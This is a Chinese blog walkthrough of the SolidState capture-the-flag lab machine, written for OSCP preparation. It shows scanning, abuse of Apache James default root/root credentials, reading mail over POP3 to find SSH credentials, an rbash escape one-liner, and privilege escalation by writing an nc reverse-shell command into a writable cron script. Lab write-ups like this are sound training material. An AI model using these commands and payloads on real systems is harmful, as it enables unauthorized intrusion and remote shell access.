SolidState

最新推荐文章于 2025-06-04 07:49:28 发布
最新推荐文章于 2025-06-04 07:49:28 发布
阅读量351 收藏 6
点赞数 4
文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43433141/article/details/144574193
版权

1.将靶机导入vm中,获取靶机的ip地址

靶机ip为192.168.55.137

2.对靶机进行端口扫描、目录遍历、指纹识别

端口扫描

目录枚举

指纹识别

nmap 192.168.55.137 -sV -sC -O --version-all

使用searchsploit查找历史漏洞,直接找到版本对应的漏洞信息,第一个漏洞是ruby写的,第二个是python写的,感觉第二个更好利用

使用searchsploit -m 35513将脚本下载到桌面上

3.打开靶机的网站寻找信息

发现网页没有什么有用的信息

4.回看指纹识别时奇怪端口

指纹识别时发现这个端口很奇怪

对端口的服务进行搜索,发现此端口的服务是邮件服务

发现默认的账号和密码均为root

成功登陆

发现一共有5名用户

发现root用户可以更改密码,我们可以先将每个用户的密码修改为123456方便后续操作

尝试了一下其他命令,发现都没有更多信息,此时可以去查看其他开放端口

110端口开放,可以使用telnet命令远程登陆james账号,查看信息,发现没有信息

thomas用户也没有信息

等到登陆john用户时,发现有邮件信息

retr和stor命令是FTP协议中的下载和上传命令, 可以针对文件和目录

使用retr命令查看邮件信息,发现没啥用

随后去查看mindy的邮箱查看她的邮件

发现她有两封邮件,一一查看,发现第二封邮件中有她的账号和密码,由于22端口开放,猜测泄露的信息为ssh登陆凭证

使用ssh成功登陆mindy账户,但是此时shell受限,很多基础命令执行不了,rbash可以进行绕过

1.exp进行绕过

先将python文件修改一下,将此处的代码改为kali攻击机的ip和端口

运行该脚本(后面要跟靶机的ip)

先在本地开启监听,然后重新ssh登陆

2.一句话绕过

ssh mindy@192.168.55.137 "export TERM=xterm;python -c 'import pty;pty.spawn(\"/bin/bash\")'"

5.进行提权操作

由于刚刚是james给mindy发的消息,我们可以先去看看james的进程

看到进程是在opt目录下,可以进入opt目录下进行查看

发现tmp.py文件具有读写权限,查看tmp.py脚本的内容发现它是定期删除/tmp/目录下的文件

首先开启4444端口的监听

echo 'import os; os.system("/bin/nc 192.168.55.129 4444 -e /bin/bash")' > /opt/tmp.py

cat tmp.py

python tmp.py

成功提权!

有想报考oscp的读者可以咨询作者,我们泷羽sec目前正在做oscp培训,泷老师带着打100+台靶机,同时还有直播讲解知识点,详情可以咨询笔者(微信在下方海报上)

图片

泷羽Sec-pp
关注
OSCP靶场1-SolidState(smtp、pop3、james
墨痕诉清风的博客
04-22 466
注:如果下载文件,通过 python -m http.server 80,进入 /tmp文件夹下载,否则经常出现没有权限。1. 可以看到这是台32位 debian 操作系统,内核版本 Linux 4.9.0,可以进行查找该内核提权漏洞。根据exp解释,当登录任意用户将执行反弹shell,利用了 /etc/bash_completion.d 机制。成功反弹,且因为payload利用的是sh,已经不受限制rbash了。利用ssh登录,但是被rbash限制,非常多的命令不能使用,退出。
vulnhub-SolidState: 1靶机渗透测试
m0_68117643的博客
07-05 1006
vulnhub-SolidState: 1靶机渗透测试
渗透之SolidState靶机
lga0325的博客
12-22 980
天天学习天天进步
实战打靶集锦-002-SolidState
阿尔泰野狼的博客
01-21 1583
本文记述了博主打靶的心路历程。
vulnhub:SolidState
cjstang的博客
06-14 872
OSCP-No.1:SolidState,主要漏洞利用方式:4555端口james服务默认密码漏洞+rbash逃逸提权
HTB-SolidState
qq_42488061的博客
08-29 1109
HTB-SolidState
oscp备考,oscp系列——SolidState靶场,两种方法绕过rbash环境
2202_75361164的博客
12-19 1010
oscp备考,oscp系列——SolidState靶场,两种方法绕过rbash环境难度简单偏上nmap扫描4555端口发现james,发现历史漏洞:默认账号密码:root/root,远程命令执行通过telnet,pop3服务,邮箱服务,使用retr命令下载文件,发现账号密码,猜测为ssh登录登录之后发现是rbash,获取第一个flag进行逃逸,并且提权,获取第二个flag。
打靶日记 SolidState
2403_88668158的博客
04-28 1005
泷羽Sec-临观。
vulnhub SolidState: 1
箭雨镜屋
01-18 3128
渗透思路: nmap扫描---->默认账号登录James Remote Admin修改用户密码---->登录pop3端口查看邮件内容找到系统登陆的账户密码---->ssh登录/利用Apache James Server 2.3.2远程命令执行漏洞获得反弹shell----->查找权限777的文件,并用定时任务提权
靶机渗透测试(SolidState: 1)
@小张小张的博客
11-26 1522
靶机渗透测试(): Vulnhub靶机 靶机:修改靶机网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(Initial Shell (Easy) - Privileges Escalation (Intermediate)) 目标:Flags: 3 (local.txt, user.txt & root.txt) flag进度:3/3 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 命令:netdiscove
小白的靶机VulnHub-SolidState
热门推荐
wo41ge的博客
02-18 2万+
靶机地址:https://www.vulnhub.com/entry/solidstate-1,261/ 开机界面就是这样 拿到靶机的IP地址:192.168.106.151 可以看到的靶机开放了22(ssh)、25(smtp)、80(http)、110(pop3)、119(nntp)、4555(james-admin) 这里有一个漏洞:JAMES Remote Admin 2.3.2存在漏洞 具体可以看这里 那我们就直接去4555端口 因为是Remote Admin Service 所以我们上nc连
solidstate-wordpress:固态-WordPress主题
03-15
固态(Wordpress) ... 出于任何目的,此主题都归类为个人博客主题。 预览 现场演示: : 特征 自定义Wordpress定制器中的所有内容,包括: 头版图标 头版介绍会 ...创建两个空页面,一个命名为Blog(最好将其永久链接...
APM32芯得 EP.07 | 探索使用以太网(ETH),搭建一个简单的本地HTTP服务器
cheukyau的博客
06-03 568
本文分享基于APM32系列芯片的ETH模块HTTP服务实现方法。文章详细介绍了HTTP协议特点、LWIP1.4.1的轻量级HTTP服务实现,以及嵌入式Web服务器搭建步骤:1)移植LWIP库;2)使用makefsdata工具转换HTML文件;3)编写httpd_cgi_ssi.c实现SSI和CGI功能,包括ADC数据采集和LED控制;4)配置开发板静态IP地址。实验现象展示了通过网页访问开发板IP地址,实现LED控制和ADC数据采集功能。
仓颉语言---Socket编程
w_zero_one的博客
06-02 966
Socket(套接字)可以被理解为网络上两个进程之间通信的端点。它是网络通信的抽象表示,封装了底层网络协议的复杂性,为应用程序提供了一个简单统一的接口。Socket 编程是一种网络编程范式,它允许不同计算机上的进程通过网络进行通信。这种通信可以发生在同一设备上的不同进程之间,也可以发生在不同地理位置的设备之间。Socket 编程提供了一种标准的方式来实现网络通信,是构建各种网络应用的基础。
【计算机网络】第七章 运输层
wuyufei_sun的博客
06-03 411
物理层、数据链路层和网络层,共同解决了将主机通过异构网络互联起来所面临的问题,实现了在计算机网络中实际进行通信的真正实体,是位于通信两端主机中的进程如何为运行在提供直接的逻辑通信服务,就是运输层的主要任务。运输层协议又称为端到端协议。
K-匿名模型
qq_65213554的博客
06-02 1102
K-匿名模型是一种隐私保护技术,通过数据泛化和抑制操作,确保发布数据中的每条记录至少与其他K-1条记录在准标识符(QIDs)上不可区分,防止个体被重新识别。其核心是抵御链接攻击,适用于医疗、普查等敏感数据的公开场景。虽然K-匿名平衡了数据效用与隐私,但仍面临同质性攻击、背景知识攻击等局限。后续改进模型如L-多样性和T-接近性增强了防护,但过度泛化导致的数据效用下降和动态数据失效仍是挑战。该技术直观易实现,但在实际应用中需权衡隐私保护与数据分析需求。
探索Heal项目的独特魅力:提高工作效率的简易指南
最新发布
weixin_44626085的博客
06-04 401
今天,我们要介绍的项目名为 “Heal”,它展示了一个完整的漏洞利用流程,从信息收集到最终获取服务器的控制权,全程步步为营。在破解了用户的哈希值后,获取到了能够利用LimeSurvey 插件系统上传并安装恶意插件的权限,获得了更多的对目标服务器的访问权限。在开始进行安全测试之前,了解目标服务器的基本信息是非常重要的,因此Heal项目从最初的网络扫描开始,使用nmap工具发现开放的TCP端口:22(SSH)和80(HTTP)。这样的扫描在发现开放端口之后,接下来就是对服务版本的探查和可能存在漏洞的挖掘。
Linux系统配置网络优先级
阿杰的博客
06-01 372
在Linux系统中,可通过metric值调整默认网关优先级(数值越小优先级越高)。提供两种配置方法: nmcli:适用于NetworkManager管理的网络,使用nmcli connection modify设置ipv4.route-metric(如以太网100,WiFi 200),并重启连接生效。 Netplan(Ubuntu推荐):编辑YAML文件,禁用DHCP自动路由,手动定义routes并指定metric(如以太网100、WiFi 200),最后执行netplan apply。验证优先级可
HCIP(BGP基础)
2301_80632830的博客
06-03 942
簇列表--AS_path---每经过一个反射器的反射均会添加该反射器的RID(簇ID)到簇列表中,之 后设备一旦收到一条IBGP路由时,如果路由携带的簇ID和自身设备的簇ID一致,那么将拒绝 学习该路由。起源者ID--在一个AS内部反射路由的源头设备的RID--当设备产生反射路由时如果没有起源者ID 那么将添加该属性,如果反射器反射路由时该路由已经存在起源者ID那么将仅反射。update报文--更新报文用来承载BGP路由信息的报文。open报文---建立BGP对等体。
20comm-um002:通讯卡设置与D网配置指南
它在Solidstate equipment(固态设备)的应用中有重要作用,这类设备与传统机电设备在操作特性上存在显著差异。 文档强调了对于固态控制设备的安全使用,指出用户应遵循Solidstate Controls应用、安装和维护的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值